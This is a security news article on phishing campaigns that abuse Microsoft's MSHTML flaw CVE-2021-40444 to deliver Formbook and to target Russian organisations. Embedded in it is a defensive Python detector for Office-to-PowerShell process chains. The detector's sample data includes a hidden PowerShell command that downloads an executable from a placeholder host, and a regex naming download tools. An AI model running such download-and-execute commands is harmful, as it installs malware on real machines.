
Malware Attackers Could Circumvent a Critical Microsoft MSHTML Flaw Due to a New Exploit

A short-lived phishing campaign was observed taking advantage of a novel exploit that bypassed the patch Microsoft issued for a remote code execution vulnerability in the MSHTML component, with the goal of spreading Formbook malware. "The attachments represent an escalation of the attacker's abuse of the CVE-2021-40444 bug and demonstrate that even a patch can't always mitigate the actions of a motivated and sufficiently skilled attacker," SophosLabs researchers Andrew Brandt and Stephen Ormandy said in a new report.

CVE-2021-40444 (CVSS score: 8.8) is a remote code execution flaw in MSHTML that can be exploited using specially crafted Microsoft Office documents. Although Microsoft patched the flaw in its September 2021 Patch Tuesday releases, it has been exploited in multiple attacks since details of the flaw became public.

The same month, the technology giant discovered a targeted phishing campaign that used the vulnerability to install Cobalt Strike Beacons on affected Windows systems. According to the Microsoft Threat Intelligence Center, the attacks exploited the vulnerability as part of an initial access effort that used modified Cobalt Strike Beacon loaders. These loaders communicated with infrastructure associated with several cybercriminal operations, including human-operated ransomware, according to Microsoft.

Sophos found a new campaign that seeks to circumvent the patch's safeguards by modifying a publicly available proof-of-concept Office exploit and weaponizing it to distribute Formbook malware. According to the cybersecurity firm, the attack's success can be attributed to a "too-narrowly focused patch."

"In the initial versions of CVE-2021-40444 exploits, the malicious Office document retrieved a malware payload packaged into a Microsoft Cabinet (or .CAB) file," the researchers explained. "When Microsoft's patch closed that loophole, attackers discovered they could use a different attack chain altogether by enclosing the maldoc in a specially crafted RAR archive." 

The modified attack, known as CAB-less 40444, ran for 36 hours between October 24 and 25, during which spam emails carrying a malformed RAR archive were delivered to potential victims. The RAR file contained a Windows Script Host (WSH) script and a Word document that, when opened, contacted a remote server hosting malicious JavaScript. That JavaScript then used the Word document to launch the WSH script, which executed a PowerShell command embedded in the RAR file to retrieve the Formbook payload from an attacker-controlled website.
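The chain described above (Word document, then Windows Script Host, then PowerShell fetching a payload) is visible to defenders as a process tree. The following detection sketch is an added example, not code from the article or from Sophos: it walks constructed process-creation events (field names are assumptions, loosely modelled on Sysmon event 1) and flags any script host or shell whose ancestry leads back to an Office application, raising severity when the command line also hints at a download.

```python
"""Added example: flag Office -> script host -> PowerShell process chains.

The events below are constructed for illustration; the record layout
(pid, ppid, image, cmdline) is an assumption, not a specific product's schema.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the created process
    cmdline: str    # command line of the created process


# Office hosts that should not normally launch script interpreters.
OFFICE_HOSTS = {"winword.exe", "excel.exe", "powerpnt.exe"}

# Script hosts / shells seen in the CAB-less 40444 chain and similar maldoc chains.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe",
                "powershell.exe", "pwsh.exe", "cmd.exe"}

# Command-line fragments that suggest the child is fetching something remote.
DOWNLOAD_HINTS = re.compile(
    r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|"
    r"\bwget\b|bitsadmin|https?://)", re.IGNORECASE)

MAX_DEPTH = 5  # how far up the tree to look for an Office ancestor


def basename(path: str) -> str:
    """Normalise a Windows or POSIX path to its lower-cased file name."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def find_office_spawn_chains(events):
    """Return one finding per script-host process with an Office ancestor.

    Each finding records the ancestry (root first), the flagged pid and a
    severity: 'high' if the command line also looks like a download, else
    'medium'.
    """
    by_pid = {e.pid: e for e in events}
    findings = []
    for ev in events:
        if basename(ev.image) not in SCRIPT_HOSTS:
            continue
        chain, cur = [ev], ev
        while cur.ppid in by_pid and len(chain) <= MAX_DEPTH:
            cur = by_pid[cur.ppid]
            chain.append(cur)
            if basename(cur.image) in OFFICE_HOSTS:
                downloads = bool(DOWNLOAD_HINTS.search(ev.cmdline))
                findings.append({
                    "pid": ev.pid,
                    "chain": [basename(p.image) for p in reversed(chain)],
                    "severity": "high" if downloads else "medium",
                })
                break
    return findings


# Constructed sample telemetry: one malicious chain, one benign shell.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              'WINWORD.EXE "C:\\Users\\u\\Downloads\\form.docx"'),
    ProcEvent(300, 200, r"C:\Windows\System32\wscript.exe",
              'wscript.exe "C:\\Users\\u\\AppData\\Local\\Temp\\x.wsf"'),
    ProcEvent(400, 300, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -w hidden (New-Object Net.WebClient).DownloadFile("
              "'http://payload.example/p.exe','C:\\Users\\u\\p.exe')"),  # placeholder URL
    ProcEvent(500, 100, r"C:\Windows\System32\cmd.exe", "cmd.exe /c dir"),
]


if __name__ == "__main__":
    for f in find_office_spawn_chains(SAMPLE_EVENTS):
        print(f["severity"], f["pid"], " -> ".join(f["chain"]))
```

Run stand-alone, the script reports two findings: the WSH process (medium) and the PowerShell grandchild (high). The benign `cmd.exe` under Explorer is not reported because no Office host appears in its ancestry, which is the point of walking the tree rather than matching on the child name alone.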

The modified RAR archives would not work with older versions of the WinRAR software, which explains why the exploit disappeared after little more than a day of use. "Unexpectedly, in this case, users of the much older, obsolete version of WinRAR would have been better protected than users of the most recent release," the researchers wrote.

MSHTML Attack Targets Russian State Rocket Centre and Interior Ministry

An MSHTML vulnerability tracked as CVE-2021-40444 is being used to target Russian entities, according to Malwarebytes.

Malwarebytes Intelligence has detected email attachments aimed specifically at Russian enterprises. The first template they discovered is designed to resemble an internal communication within JSC GREC Makeyev.

The Joint Stock Company State Rocket Center named after Academician V.P. Makeyev is a strategic asset of the country's defence and industrial complex for both the rocket and space industries. It is the primary manufacturer of liquid- and solid-fuel strategic missile systems with ballistic missiles, making it one of Russia's largest research and development centres for rocket and space technology.

The email purports to come from the organization's Human Resources (HR) department. It states that HR is verifying the personal information provided by employees, who are asked to fill out a form and send it to HR, or to reply to the email.

To fill out the form, the recipient must enable editing, and that action alone is enough to trigger the exploit. When the target opens the malicious Office document, MSHTML loads a specially crafted ActiveX control, which can then execute arbitrary code and deliver further malware to the machine.

The second file Malwarebytes discovered appears to come from Moscow's Ministry of the Interior. Such an attachment could be used against a wide range of interesting targets. The document's title translates to "Notification of illegal activity."

It asks the recipient to complete the form and submit it to the Ministry of Internal Affairs, or to reply to the email, and urges the targeted victim to do so within seven days.

Malwarebytes further stated that they seldom come across evidence of cybercrime against Russian targets. Given the targets, particularly the first, they believe a state-sponsored actor is behind these attacks and are investigating their source.

Vulnerability Patch

The CVE-2021-40444 vulnerability is old-fashioned in nature (it involves ActiveX), yet it was discovered only recently. It did not take long for threat actors to post proofs-of-concept, tutorials, and exploits on hacker forums, allowing anybody to conduct their own attacks by following step-by-step instructions.

Microsoft promptly issued mitigation guidance that blocked the installation of new ActiveX controls, and managed to include a fix in its next Patch Tuesday release, just a few weeks after the flaw was made public.

The time it takes to build a patch, however, is frequently dwarfed by the time it takes users to apply it. Organizations, particularly large ones, are often found to be far behind in patching, so the likelihood of further attacks like these increases.